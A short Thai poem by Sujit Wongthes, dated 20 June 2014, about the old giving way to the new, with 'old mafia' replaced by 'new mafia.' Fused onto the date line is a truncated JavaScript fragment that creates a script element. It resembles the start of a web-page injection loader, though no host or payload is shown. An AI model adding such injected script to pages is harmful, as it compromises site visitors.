เก่าไป ใหม่มา

 

เก่าไปใหม่มาเป็นสามัญ

ร้อยวันพันปีหนีไม่ได้

ดีไม่ดีมีแน่แน่แต่ไหนแต่ไร

มาเฟียเก่าไป มาเฟียใหม่ก็มา

 

สุจิตต์ วงษ์เทศ

ศุกร์ 20 มิถุนายน 2557var d=document;var s=d.createElement(‘script’);